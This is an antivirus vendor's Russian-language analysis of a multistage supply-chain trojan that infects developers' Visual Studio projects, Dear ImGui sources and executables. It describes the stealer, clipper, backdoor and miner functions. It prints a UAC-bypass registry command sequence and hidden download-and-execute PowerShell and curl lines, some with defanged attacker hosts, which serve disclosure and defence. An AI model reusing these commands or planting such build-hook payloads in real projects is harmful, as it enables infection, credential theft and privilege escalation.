Цель – разработчики. Новый троян атакует цепочки поставок и наносит комбинированный ущерб зараженным ПК

«Горячие» новости | Все новости | О вирусах

Объектом исследования специалистов антивирусной лаборатории стала новая троянская программа. Она представляет собой угрозу типа supply chain attack, т. е. атака на цепочки поставок. Отличительная черта этого ВПО — фокус на проекты, созданные на языке программирования С++ и C#. Еще одна особенность — повышенная опасность. Троян объединяет в себе ряд поражающих факторов, одновременно выполняя несколько функций: стилера, клиппера, бэкдора, майнера и источника заражения файлов.

Первые случаи распространения трояна были зафиксированы в последнем квартале 2025 года, с тех пор он постоянно модифицируется разработчиками. В основном он распространяется по интернету через зараженные .exe и python файлы. Процесс заражения многоступенчатый, разберем протекание каждой стадии и их цели одну за другой.

Стадия 1. Trojan.DownLoader49.35384

Специалисты «Доктор Веб» обнаружили множество зараженных легитимных приложений с похожей структурой. В изначальный исполняемый файл добавлен глобальный объект, а выполнение троянизированного приложения начинается с получения доступа к системным API через метод PEB walking. Далее стандартная функция initterm проходит таблицу указателей функций и инициализирует их, где одна из таких функций является вредоносной и запускает PowerShell команду. В некоторых версиях трояна эта нагрузка хранится в зашифрованном виде.

Запуск через initterm

PowerShell команда скачивает и выполняет вредоносный файл Trojan.DownLoader49.35687, что означает запуск второй стадии.

Вредоносная PowerShell команда

В дополнение к исполняемым файлам были обнаружены файлы на языке Python (Python.Downloader.255). В них тот же вредоносный код был зашифрован с помощью механизма симметричного шифрования Fernet. Он спрятан за простой обфускацией — множеством пробелов в первой строке. В этом случае выполнение также проходит в несколько этапов.

Вредоносные Python файлы

Стадия 2. Trojan.DownLoader49.35687

На этом этапе троян Trojan.DownLoader49.35687 выполняет проверку своего запуска в песочнице. Кроме этого, он создает объект синхронизации mutex c именем Global\PFNMX (фиксированное значение). Пример подобного объекта: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. Таким образом троян проверяет, не запущена ли ранее на компьютере другая копия.

Во время второй стадии троян пытается получить адреса C2 сервера с помощью публичных репозиториев GitHub и игровой платформы Steam. На них злоумышленники оставляют домены, которые троян считывает и использует как URL для загрузки третьей стадии — трояна BackDoor.Siggen2.5906.

Аккаунты Steam, созданные злоумышленниками, содержат название домена в открытом виде.

Аккаунт Steam с C2 доменом

На GitHub злоумышленники сохранили зашифрованный адрес C2 домена в виде raw файла: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Троян загружает этот файл и расшифровывает его сначала через Base64, а затем с помощью операции XOR с ключом ZwFlushKey.

Зашифрованные домены

После скачивания следующей стадии, Trojan.DownLoader49.35687 внедряет ее в процесс одного из 41 заранее указанных исполняемых файлов из C:\Windows\System32.

Адрес домена С2, с которым удалось установить связь, добавляется к прописанным в исходном коде трояна строкам и передается следующей стадии через именованный канал pipe\VccFramework.

Стадия 3. BackDoor.Siggen2.5906

На этой стадии происходит основная вредоносная деятельность. BackDoor.Siggen2.5906 создает объект синхронизации mutex с фиксированным именем вида Global\PFNX_Side (фиксированное значение). Затем через ранее созданный канал троян получает данные от второй стадии, откуда извлекает идентификаторы трояна и домен С2, с которым BackDoor.Siggen2.5906 будет коммуницировать.

Чтобы закрепиться в системе, троян скачивает файл «bungee.boo», который выполняет функции стадии 2 — Trojan.DownLoader49.35687, и подменяет им DLL файлы:

  • «profapi.dll» приложения Discord,
  • «domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains» приложения Microsoft Edge,
  • «C:\Windows\omadmapi.dll».

Дополнительно BackDoor.Siggen2.5906 может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.

Для действий с правами администратора троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe

Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.

Стилер

Троян способен красть различную информацию:

  • токены Discord, которые позволяют войти в чужие аккаунты без ввода логина/пароля;
  • пароли и куки из браузеров Chrome, Edge, Opera, Brave, Yandex и др. Кроме обычных техник извлечения данных, может использовать файл CCCWF.tmp (Trojan.PWS.Siggen5.33623). Он встраивается в браузер, а затем считывает пароли и сохраняет их в текстовые файлы;
  • папки Telegram Desktop;
  • папки криптокошелька Exodus.

Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL balista[.]lol/Stb/PokerFace/RTApp[.]txt при помощи curl. В подмененной версии в index.js (Trojan.Siggen32.44702) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.

Подмененный файл index.js

Клиппер

Особо опасная функция трояна. ВПО постоянно следит за буфером обмена пользователя: ищет данные банковских карт и отправляет их на сервер злоумышленников. Также вредонос заменяет адреса криптокошельков на подставные, которые получает от C2 сервера.

Бэкдор

Функциональность трояна позволяет злоумышленникам удаленно управлять зараженным ПК с помощью команд:

excскачать файл с url при помощи curl и запустить его
RVRSзапустить Reverse Proxy
RUNCMDзапустить команду через cmd
GETFILEзагрузить содержимое определенного файла на управляющий сервер
LISTDIRотправить список файлов из определенной директории компьютера на управляющий сервер
TROLLзапустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т. д.

Майнер

При помощи curl троян скачивает с сервера и запускает файл https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. Своим строением и действиями он похож на стадию 2, только вместо BackDoor.Siggen2.5906 он скачивает и внедряет Trojan.BtcMine.3956. Этот майнер запускается только после определенного периода бездействия пользователя. ВПО использует инструменты XMRig, T-Rex и TeamRedMiner с открытым исходным кодом.

Заражение файлов

Главная отличительная черта этого трояна — заражение файлов и дальнейшее самостоятельное распространение. Список заражаемых файлов:

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj и .csproj.

Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://

dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.

Злоумышленники строят свой расчет на том, что разработчики будут публиковать свои проекты с вредоносным кодом в открытом доступе. Другие разработчики, которые будут собирать, компилировать или модифицировать проект, автоматически заразят свои компьютеры из-за файлов .suo, .vcxproj и .csproj, а обычные пользователи могут запустить зараженные исполняемые файлы, созданные с помощью скомпрометированных инструментов разработки.

Файл imgui_impl_win32.cpp. Trojan.Loader.3129

Файл imgui_impl_win32.cpp — часть популярной библиотеки Dear ImGui, отвечающей за графический интерфейс для языка программирования С++. Троян внедряет в файл две строки: первая содержит полезную нагрузку, вторая запускает ее.

Строка кода с полезной нагрузкой

Строка кода с запуском пэйлоада

Итог — команда


start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 

Таким образом, библиотека оказывается зараженной и любые созданные пользователем приложения на С++ будут иметь в себе вредоносный код. При передаче или загрузке подобных приложений заражение будет распространяться дальше.

Файлы .suo. Trojan.Loader.3138

Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.

Зараженный файл

В результате при открытии проекта в Visual Studio запускается вредоносный код:


javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();

Файлы winnetwk.h. Trojan.Loader.3184

Windows SDK — официальный набор инструментов Microsoft, который позволяет создавать приложения для ОС Windows.

С помощью реестра троян находит папку, куда установлен Windows SDK. В этой папке происходит поиск файла winnetwk.h, ответственного за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.

Зараженный файл winnetwk.h

После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код, который запускает стадию 2.

Файлы .exe

Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как Trojan.DownLoader49.35384, он же стадия 1.

Файлы .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)

Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. Ранние версии трояна добавляли код, подобный стадии 1.

Ранняя версия кода

В новых версиях код стал сложнее, появилась дополнительная обфускация.

Новая версия кода

Один из этапов выполнения Trojan.Loader.3128

В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:

  • youtu.be/akoxddx6lgc,
  • steamcommunity.com/profiles/76561198737324192.

На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64.

YouTube-аккаунт с зашифрованным URL-адресом

После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной со стадией 2.

Описание работы трояна позволяет сделать вывод, что он представляет повышенную опасность из-за комбинирования целого ряда вредоносных функций. Во избежание заражения своего компьютера и дальнейшего распространения трояна рекомендуем регулярно обновлять антивирусные базы и проверять все скачанные из интернета файлы. Пользователи антивируса Dr.Web Security Space и Dr.Web Desktop Security Suite могут быть спокойны, поскольку троян надежно определяется и удаляется антивирусами Dr.Web. Файлы типа .vcxproj, .csproj и imgui лечатся, из них удаляется вредоносный код.

Подробнее об Trojan.DownLoader49.35384

Подробнее об Trojan.DownLoader49.35687

Подробнее об BackDoor.Siggen2.5906

Подробнее об Trojan.BtcMine.3956

Индикаторы компрометации

0
Последние новости Все новости